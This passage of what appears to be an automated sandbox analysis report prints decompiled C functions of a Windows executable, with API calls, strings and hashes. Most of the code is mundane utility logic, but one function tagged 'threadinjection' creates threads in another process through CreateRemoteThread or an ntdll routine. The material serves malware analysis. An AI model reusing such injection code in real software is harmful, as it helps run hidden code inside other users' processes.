							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

APIs

wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

APIs

GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Line%d, xrefs: 004016AE
Lines, xrefs: 00401696

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

LookupAccountSidW, xrefs: 0040907F
Y@, xrefs: 0040906D

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

SHGetSpecialFolderPathW, xrefs: 0040AC6F
shell32.dll, xrefs: 0040AC5B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
